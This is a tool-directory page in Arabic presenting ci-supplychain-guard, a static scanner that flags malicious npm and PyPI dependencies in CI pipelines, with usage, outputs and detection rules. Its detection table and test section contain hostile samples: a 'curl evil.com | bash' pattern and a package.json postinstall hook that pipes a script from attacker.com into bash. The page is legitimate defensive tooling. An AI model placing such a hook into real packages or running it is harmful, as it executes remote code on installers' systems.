Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
ci-supplychain-guard — أداة تحليل ثابتة تكتشف التبعيات الخبيثة في خطوط أنابيب CI/CD باستخدام مطابقة الأنماط وتحليل AST، مع نظام ترتيب مخاطر بتدرج ألوان إشارة المرور وإمكانية التحقق الاختياري باستخدام حاوية Docker معزولة. | Kitploit
أدوات/GitHubGitHub/otsmane-ahmed/ci-supplychain-guard
التحليل الثابتماسحات الثغرات الأمنيةأمن الحاوياتتحليل الكودتحليل البرمجيات الخبيثةDevSecOpsكشف الأسرارأمن سلسلة التوريد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
GitHub
otsmane-ahmed/ci-supplychain-guard

ci-supplychain-guard

أداة تحليل ثابتة تكتشف التبعيات الخبيثة في خطوط أنابيب CI/CD باستخدام مطابقة الأنماط وتحليل AST، مع نظام ترتيب مخاطر بتدرج ألوان إشارة المرور وإمكانية التحقق الاختياري باستخدام حاوية Docker معزولة.

عرض المستودع
2853منذ 7 أشهرتمت المراجعة من قبل Kitploit
مشاركة

حارس سلسلة توريد CI

أداة تحليل ثابتة للكشف عن التبعيات الضارة في خطوط CI/CD قبل دمجها في قاعدة الكود الخاصة بك.

License: MIT Python 3.10+

المؤلف: Otsmane Ahmed
الحالة: نموذج أولي بحثي v1.0


بداية سريعة

root@kitploit:~
# 1. Clone and install
git clone https://github.com/Otsmane-Ahmed/ci-supplychain-guard.git
cd ci-supplychain-guard
python3 -m venv venv
source venv/bin/activate  # On Windows: venv\Scripts\activate
pip install -r requirements.txt


```bash
# 1. Clone and install
git clone https://github.com/Otsmane-Ahmed/ci-supplychain-guard.git
cd ci-supplychain-guard
python3 -m venv venv
source venv/bin/activate  # On Windows: venv\Scripts\activate
pip install -r requirements.txt

# 2. Scan a package directory
python3 main_guard.py /path/to/package

ستقوم الأداة بإخراج حكم: SAFE أو أو .

SUSPICIOUS
BLOCKED

أمثلة الاستخدام

فحص حزمة قبل التثبيت

إذا قمت بتنزيل حزمة من npm أو PyPI وتريد التحقق من أنها آمنة:

root@kitploit:~
# NPM package
npm pack suspicious-package
tar -xzf suspicious-package-*.tgz
python3 main_guard.py ./package

# Python package
pip download untrusted-pkg --no-deps
tar -xzf untrusted-pkg-*.tar.gz
python3 main_guard.py ./untrusted-pkg-1.0.0

فحص التبعيات المثبتة

تحقق من الحزم المثبتة بالفعل في مشروعك:

root@kitploit:~
# Scan all npm packages
python3 main_guard.py ./node_modules

# Scan a specific Python package
python3 main_guard.py ./venv/lib/python3.10/site-packages/requests

ملاحظة: فحص الأدلة الكبيرة مثل node_modules سيستغرق وقتًا أطول. للحصول على نتائج أسرع، افحص الحزم الفردية.

التكامل مع CI/CD

مثال على سير عمل GitHub Actions:

root@kitploit:~
name: Security Scan
on: [pull_request]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: Setup Python
        uses: actions/setup-python@v4
        with:
          python-version: '3.10'
      - name: Install CI-Guard
        run: |
          git clone https://github.com/Otsmane-Ahmed/ci-supplychain-guard.git
          cd ci-supplychain-guard
          pip install -r requirements.txt
      - name: Scan Dependencies
        run: |
          cd ci-supplychain-guard
          python3 main_guard.py ../your-project-directory

سيفشل خط الأنابيب (رمز الخروج 1) إذا تم اكتشاف كود ضار.


فهم المخرجات

حزمة آمنة

root@kitploit:~
$ python3 main_guard.py ./clean-package

Scanning target: ./clean-package
Running static analysis...
Static Risk Score: 0/100
Verdict: SAFE

لم يتم اكتشاف أنماط ضارة.

حزمة محظورة

root@kitploit:~
$ python3 main_guard.py ./evil-package

Scanning target: ./evil-package
Running static analysis...
Static Risk Score: 18/100
Verdict: BLOCKED (Critical Risk)

تم اكتشاف أنماط خطيرة (مثل حقن الأوامر، سرقة بيانات الاعتماد). لا تقم بتثبيت هذه الحزمة.

يتم حظر الحزم التي تحصل على درجة 10 أو أعلى تلقائيًا.

حزمة مشبوهة

root@kitploit:~
$ python3 main_guard.py ./suspicious-package

Scanning target: ./suspicious-package
Running static analysis...
Static Risk Score: 6/100
Verdict: SUSPICIOUS (Score 6). Initiating sandbox...

تم العثور على بعض الأنماط المقلقة. إذا كان Docker قيد التشغيل، سيتم اختبار الحزمة في صندوق رمل معزول للتحقق. يُوصى بالمراجعة اليدوية.


قدرات الكشف

نوع الهجوممثالالحالة
حقن الأوامرcurl evil.com | bashتم الكشف
سرقة بيانات الاعتمادقراءة process.env وإرسالها إلى خادم خارجيتم الكشف
تشويش الكودeval(atob('base64...'))تم الكشف
نصوص التثبيت الضارةروابط NPM postinstallتم الكشف
الملفات الثنائية.exe, .dll في الحزمتم الكشف
انتحال الاسمأسماء مشابهة لحزم شهيرةمطلوب فحص يدوي

اختبار الأداة

يمكنك اختبار CI-Guard عن طريق إنشاء حزمة ضارة عينة:

root@kitploit:~
# Create test directory
mkdir ~/test-malicious
cd ~/test-malicious

# Create package.json with malicious postinstall hook
cat > package.json << 'EOF'
{
  "name": "evil-package",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "curl http://attacker.com/steal.sh | bash"
  }
}
EOF

# Scan it
cd ~/ci-supplychain-guard
python3 main_guard.py ~/test-malicious

المخرجات المتوقعة:

root@kitploit:~
Static Risk Score: 18/100
Verdict: BLOCKED (Critical Risk)

الأداء

النظام البيئيالحزم المختبرةمعدل الكشف
NPM15,05989.6%
PyPI2,25782.2%

متوسط وقت الفحص: 1-3 ثوانٍ لكل حزمة (التحليل الثابت فقط)


الأسئلة الشائعة

هل يمكنني فحص الحزم المثبتة بالفعل؟

نعم. وجه CI-Guard إلى دليل node_modules الخاص بك أو site-packages الخاص بـ Python:

root@kitploit:~
python3 main_guard.py ./node_modules/some-package
python3 main_guard.py ./venv/lib/python3.10/site-packages/requests

ماذا لو تم وضع علامة على حزمة شرعية؟

CI-Guard يخطئ في جانب الحذر. إذا كنت تثق في حزمة تم وضع علامة عليها:

  1. تحقق من قواعد الكشف في analyzer/static_scanner.py
  2. حدد النمط الذي أثار التنبيه
  3. راجع كود مصدر الحزمة يدويًا

هل يعمل هذا على Windows و macOS؟

نعم. Python و Docker متعددان المنصات.

هل أحتاج إلى تثبيت Docker؟

Docker مطلوب فقط للحزم التي تسجل 4-9 (مشبوهة). معظم الحزم إما آمنة بوضوح (0-3) أو ضارة بوضوح (10+).


المتطلبات

  • Python 3.10+
  • Docker (اختياري، للتحقق في صندوق الرمل)
  • أنظمة التشغيل المدعومة: Linux, macOS, Windows

كيف يعمل

يستخدم CI-Guard نظام "إشارات المرور" ثلاثي المستويات:

  • أخضر (0-3): آمن - لم يتم اكتشاف أنماط ضارة
  • أصفر (4-9): مشبوه - يتطلب التحقق في صندوق الرمل
  • أحمر (10+): محظور - تم العثور على أنماط ضارة حرجة

طرق الكشف:

  • التحليل الثابت: مطابقة الأنماط باستخدام regex و AST (شجرة النحو المجرد)
  • تحليل الوصول: تصفية الإيجابيات الخاطئة من الكود الميت
  • صندوق الرمل: حاوية Docker اختيارية مع رموز العسل (honeytokens) لاكتشاف التهرب

المساهمة

نرحب بطلبات السحب. لإضافة قاعدة كشف جديدة:

قم بتحرير analyzer/static_scanner.py وأضف إلى قائمة RULES:

root@kitploit:~
{
    "id": "SA-XXX",
    "name": "Rule Name",
    "pattern": r"regex_pattern",
    "weight": 8  # Score contribution (1-10)
}

الترخيص

رخصة MIT - انظر ملف LICENSE للتفاصيل.


الاتصال

Otsmane Ahmed - GitHub

تنزيل الأداة